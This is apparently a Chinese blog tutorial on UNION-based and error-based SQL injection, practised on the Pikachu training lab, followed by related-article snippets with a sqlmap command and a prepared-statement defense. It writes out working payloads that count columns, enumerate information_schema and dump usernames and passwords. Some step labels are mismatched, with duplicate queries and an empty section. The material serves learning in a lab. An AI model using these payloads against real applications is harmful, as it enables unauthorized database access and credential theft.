union注入

最新推荐文章于 2025-03-18 16:32:26 发布
原创 最新推荐文章于 2025-03-18 16:32:26 发布 · 607 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#union查询

一、union注入
基于union的信息获取:

union联合查询:可以通过联合查询来查询指定的数据

用法举例:
select username,password from user where id =1 union select 字段1,字段2 from 表名

先登入PHPmyadmin 进入pikachu的数据库中
在这里插入图片描述
在这里插入图片描述

得到此结果 上述为一般查询
在这里插入图片描述

union查询:
在这里插入图片描述
在这里插入图片描述

除了通过遍历查询数据库内容外,还可以通过一下方法查询:
通过select database();来查询数据库的名称
在这里插入图片描述

在这里插入图片描述

通过select user();来查询数据库使用的用户名
在这里插入图片描述
在这里插入图片描述

通过select version();来查询数据库的版本
在这里插入图片描述
在这里插入图片描述
如果想要通过SQL注入可以通过以下方法:
在这里插入图片描述
在这里使用字符型注入来进行演示
由于我们无法知道数据库中有几个字段,所以需要通过猜测来判断字段数
下面可以通过order by来进行猜测
在这里插入图片描述
select id,email from member where username=‘allen’ order by 1; //通过第一列进行排序在这里插入图片描述

select id,email from member where username=‘allen’ order by 2; //通过第二列进行排序
在这里插入图片描述

select id,email from member where username=‘allen’ order by 3; //通过第三列进行排序
在这里插入图片描述
通过order by来进行列的排序 就可以清楚有多少个字段

让我们回到字符型注入

输入a’ order by 5 #后得到的结果 (这里用到了二分法)

在这里插入图片描述
得到下图时 ,就意味着order by 正常执行了 就可以知道有多少个字段了
在这里插入图片描述
接下来就可以进行union查询了

输入 a’ union select database(),user() #

就会显示数据库的名称和所用的用户名了
在这里插入图片描述
输入 a’ union select version(),4 #

就可以获取数据库的版本

由于必须要有两个字段 所以后面一个我们可以随意拼接一下
在这里插入图片描述
通过union查询来获得一下 数据库的基本信息 这就是union联合查询的作用

MySQL的小知识补充:information_schema
在MYSQL中,自带的information——schema 这个表中存放了大量的信息

获取数据库名(行话:爆库):
xxx’union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
1
获取表名(行话:爆表):

xxx’union select table_name,column_name from information_schema.columns where table_name=’users’#
1
获取列(行话:爆字段):

xxx’union select table_name,column_name from information_schema.columns where table_name=’users’#
1
获取密码(行话:爆数据):

xxx’union select username,password from users#

二、

三、基于函数报错的信息获取

常用的报错函数:updatexml() , extractvalue() , floor()

基于函数报错的信息获取(select/insert/update/delete)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
Select 下报错的利用演示:
在这里插入图片描述

当我们构造一个错误的语法时 会返回报错信息
在这里插入图片描述

在这里插入图片描述
出现了报错
在这里插入图片描述
这里版本被吃掉了 所以需要通过使用concat()来显示
在这里插入图片描述
在这里插入图片描述

用相同的方法获取其他表的名称

数据库名称等:
在这里插入图片描述

在这里插入图片描述
返回的数据大于一行时
在这里插入图片描述
使用如下操作
在这里插入图片描述
获取所有表后再进行如下操作 获取字段
在这里插入图片描述
在这里插入图片描述

sql注入union联合注入
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
union联合注入
m0_60945802的博客
03-21 4970
union联合注入
SQL注入Union注入
weixin_46013320的博客
03-18 704
主要解释SQL注入中关于Union的知识点。
union 联合注入
jiaohuadehuli的博客
11-29 2935
墨者学院 SQL注入靶场 本篇文章为sql注入中最基础的union联合注入。 考察知识点: 掌握SQL注入原理 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; 基础知识了解:
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
【SQL注入漏洞-02】union注入(联合查询)靶场实战
cc
02-01 7003
为了更清楚的看清sql语句的执行与变化过程,我们先修改源代码,打开Less-1/index.php,在源码中添加如下语句将执行的sql语句打印出来,方便我们查看。我们观察页面会发现,当我们输入id=1和id=2时,页面中的name和password的值是不一样的,说明我们输入的数据和数据库有交互并且将数据显示到页面上了。如果不知道表名也不影响,根据mysql数据库特性,select语句在执行的过程中,并不需要指定表名。,页面发生报错,说明后端未对前端发送的数据没有很好的过滤,产生了sql注入漏洞。
后台Union注入绕过验证1
08-08
标题中的“后台Union注入绕过验证1”是指在Web应用程序中,攻击者通过利用SQL注入漏洞,特别是使用UNION查询的方式,绕过系统的身份验证机制。这种攻击手段常见于ASP编程语言构建的网站,因为描述中提到了ASP程序中...
union注入之字符型注入和数值型注入
ws1813004226的博客
05-12 815
什么是SQL注入? SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。 字符型注入 判断方法:当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。 url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继
SQL注入union联合注入
hobby云说
06-12 3831
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
【sql注入-union注入union函数 联合注入
07-11 7755
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 1370
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
Union注入
shenzhang7331的博客
11-18 267
1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段 2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3 3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_sch...
SQL注入union 联合注入
weixin_53711701的博客
01-16 6037
SQL注入union联合注入
SQL注入-union注入
july07070707的博客
05-10 6220
联合注入
qq_35191331的博客
08-16 1039
题目连接:http://103.238.227.13:10087/ //过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','li
构造UNION注入,利用SQL语句
最新发布
04-03
### SQL Union 注入技术示例 SQL Union 注入是一种常见的攻击方式,它利用 `UNION` 运算符将恶意查询附加到原始查询上,从而获取额外的数据。以下是实现此技术的一个具体例子: 假设存在一个易受攻击的 Web 应用程序,其 URL 参数如下所示: ``` http://example.com/page.php?id=1 ``` 如果应用程序未正确验证输入,则可以尝试构造以下 SQL 查询来执行 UNION 攻击。 #### 构造 UNION 查询 ```sql SELECT column1 FROM table WHERE id = 1 UNION SELECT password FROM users; ``` 在这个例子中,攻击者试图通过添加 `UNION SELECT` 子句从另一个表(如 `users` 表)检索数据[^1]。为了成功完成这一操作,需满足以下几个条件: - 原始查询和附加查询返回相同数量的列。 - 列的数据类型兼容。 #### 实际案例分析 考虑下面的情况,其中用户名和密码字段注入恶意字符串 `' OR '1'='1`[^3]。这可能导致数据库忽略实际的身份验证逻辑并返回所有记录。然而,在更复杂的场景下,攻击者可能需要进一步探索目标系统的结构。 例如,当面对非标准格式的 URL 输入时,工具如 sqlmap 可能不会自动识别潜在漏洞位置[^4]。此时可以通过手动指定测试点解决该问题。 #### 使用 Sqlmap 自动化检测 Sqlmap 是一款强大的自动化渗透测试工具,能够帮助发现多种类型的 SQL 注入缺陷。对于上述提到的复杂路径情况,命令行选项可设置为: ```bash sqlmap -u "http://www.site.com/class_name/strategy/*/*/80" --risk=3 --level=5 ``` 这里星号标记了希望扫描的具体部分。增加风险级别 (`--risk`) 和深入程度 (`--level`) 能够提高探测效率但同时也增加了误报的可能性。 #### 防范措施实例 为了避免遭受此类攻击,推荐采用预编译语句或者存储过程等方式处理动态构建的 SQL 请求[^2]。比如在 Java 中使用 PreparedStatement 类型对象代替常规 String 拼接方法编写数据库交互代码片段。 ```java String query = "SELECT * FROM Users WHERE username=? AND password=?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, userInputName); pstmt.setString(2, userInputPassword); ResultSet rs = pstmt.executeQuery(); ``` 这样即使用户提供特殊字符也不会影响最终形成的合法指令串安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值